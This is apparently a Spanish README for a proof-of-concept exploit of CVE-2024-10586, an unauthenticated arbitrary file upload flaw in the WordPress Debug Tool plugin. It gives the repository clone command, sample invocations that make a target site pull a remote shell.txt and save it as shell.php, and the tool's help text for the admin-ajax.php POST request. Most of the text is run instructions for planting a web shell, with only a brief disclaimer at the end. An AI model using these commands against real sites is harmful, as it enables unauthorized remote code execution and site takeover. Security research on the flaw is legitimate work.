
Exploit de prueba de concepto para CVE-2024-10586 que apunta al plugin WordPress Debug Tool. Automatiza la carga arbitraria de archivos que conduce a la ejecución remota de código a través de solicitudes POST no autenticadas.
Descripción
El plugin Debug Tool para WordPress es vulnerable a la creación arbitraria de archivos debido a una falta de comprobación de capacidades en la función dbt_pull_image() y a la ausencia de validación del tipo de archivo en todas las versiones hasta la 2.2 inclusive.
Esto permite que atacantes no autenticados creen archivos arbitrarios como archivos .php que pueden ser aprovechados para la ejecución remota de código.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
Ejecuta el script con el siguiente comando: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
Este script es solo con fines educativos. Úsalo de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito de prueba. Los autores no se hacen responsables por el mal uso o daños causados por esta herramienta.